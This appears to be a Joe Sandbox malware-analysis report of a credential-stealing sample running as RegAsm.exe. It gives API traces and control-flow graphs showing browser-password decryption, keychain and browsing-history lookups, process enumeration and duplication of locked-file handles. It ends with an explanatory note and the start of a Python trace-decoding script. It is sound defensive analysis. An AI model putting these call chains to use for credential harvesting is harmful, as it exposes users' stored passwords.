                                                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                                  • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                   Control-flow Graph
                                                                                                                                   control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                  • API String ID: 2334598624-3798722523
                                                                                                                                  • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                  • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                  • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                                  • API String ID: 1442760552-28296030
                                                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                                  • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                  • String ID: chp$v10
                                                                                                                                  • API String ID: 229402216-2783969131
                                                                                                                                  • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                  • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                   Control-flow Graph
                                                                                                                                   control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 520 413e79-413eae call 413959 call 413ca4 CloseHandle 512->520 521 413e28-413e35 512->521 515 413ec8-413eda call 4099f4 513->515 516 413ebf-413ec6 free 513->516 518 413edb-413ee2 515->518 516->518 526 413ee4 518->526 527 413ee7-413efe 518->527 520->511 524 413e61-413e68 521->524 525 413e37-413e44 GetModuleHandleW 521->525 524->520 528 413e6a-413e77 QueryFullProcessImageNameW 524->528 525->524 530 413e46-413e5c 525->530 526->527 527->508 528->520 530->524
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                  • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                  • API String ID: 3957639419-1740548384
                                                                                                                                  • Opcode ID: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                  • Opcode Fuzzy Hash: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                  • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                  • String ID: bhv
                                                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                   Control-flow Graph

                                                                                                                                   • Basic blocks (id: address range, calls; successors):
                                                                                                                                   • 562: 4466f4-44670e, call 446904, GetModuleHandleA; -> 565, 566
                                                                                                                                   • 565: 446710-44671b; -> 566, 567
                                                                                                                                   • 566: 44672f-446732; -> 568
                                                                                                                                   • 567: 44671d-446726; -> 570, 571
                                                                                                                                   • 568: 44675b-4467aa, __set_app_type, __p__fmode, __p__commode, call 4153f2; -> 575, 576
                                                                                                                                   • 570: 446747-44674b; -> 566, 574
                                                                                                                                   • 571: 446728-44672d; -> 566, 573
                                                                                                                                   • 573: 446734-44673b; -> 566, 577
                                                                                                                                   • 574: 44674d-44674f; -> 578
                                                                                                                                   • 575: 4467ac-4467b7, __setusermatherr; -> 576
                                                                                                                                   • 576: 4467b8-44680e, call 4468f0, _initterm, GetEnvironmentStringsW, _initterm; -> 581, 582
                                                                                                                                   • 577: 44673d-446745; -> 578
                                                                                                                                   • 578: 446755-446758; -> 568
                                                                                                                                   • 581: 446810-446819; -> 583
                                                                                                                                   • 582: 44681e-446825; -> 584, 585
                                                                                                                                   • 583: 4468d8-4468dd, call 44693d; no successors
                                                                                                                                   • 584: 446827-446832; -> 588, 589
                                                                                                                                   • 585: 44686c-446870; -> 586, 587
                                                                                                                                   • 586: 446845-44684b; -> 593, 594
                                                                                                                                   • 587: 446872-446877; -> 585
                                                                                                                                   • 588: 446834-446838; -> 584, 589
                                                                                                                                   • 589: 44683a-44683e; -> 586, 591
                                                                                                                                   • 591: 446840-446842; -> 586
                                                                                                                                   • 593: 446853-446864, GetStartupInfoW; -> 595, 596
                                                                                                                                   • 594: 44684d-446851; -> 591, 593
                                                                                                                                   • 595: 446866-44686a; -> 597
                                                                                                                                   • 596: 446879-44687b; -> 597
                                                                                                                                   • 597: 44687c-446894, GetModuleHandleA, call 41276d; -> 600, 601
                                                                                                                                   • 600: 446896-446897, exit; -> 601
                                                                                                                                   • 601: 44689d-4468d6, _cexit; -> 583
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                  • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                  • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                  • __p__commode.MSVCRT ref: 00446785
                                                                                                                                  • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                  • _initterm.MSVCRT ref: 004467C7
                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                  • _initterm.MSVCRT ref: 004467FD
                                                                                                                                  • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                  • exit.MSVCRT ref: 00446897
                                                                                                                                  • _cexit.MSVCRT ref: 0044689D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2791496988-0
                                                                                                                                  • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                  • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                  • String ID: visited:
                                                                                                                                  • API String ID: 2470578098-1702587658
                                                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
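
The API lists of the three functions above (the CreateToolhelp32Snapshot/Process32NextW/QueryFullProcessImageNameW loop at 00413D6A-00413F1A, the OpenProcess/DuplicateHandle/CreateFileMappingW/MapViewOfFile/WriteFile chain at 0040E093-0040E14D, and the FindFirstUrlCacheEntryW walk at 0040C30D) read more easily once the raw hexadecimal arguments are mapped back to their Win32 constants: OpenProcess(00000410) is PROCESS_VM_READ|PROCESS_QUERY_INFORMATION, OpenProcess(00000040) is PROCESS_DUP_HANDLE, CreateToolhelp32Snapshot(00000002) is TH32CS_SNAPPROCESS, NtQuerySystemInformation(00000010) is SystemHandleInformation, and CreateFileW is opened with GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE and OPEN_EXISTING. The script below is an added example written for this page; it is not Joe Sandbox code and not part of the Remcos sample. It parses API lines in the format printed here, decodes those constants, and applies three heuristics to name what the call chains amount to. The regular expression, the constant tables, the heuristic wording and the sample lines (copied from the listings above, not captured live) are this example's own assumptions, and the verdicts are one analyst's reading of the chains, not Joe Sandbox signatures.

```python
"""Decode Joe Sandbox API-trace lines into a behaviour summary.
Added example for this page, not Joe Sandbox code: the line format, the
constant tables and the heuristics below are this example's own assumptions."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: API lines copied from the function listings on this page.
SAMPLE_TRACE = """
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
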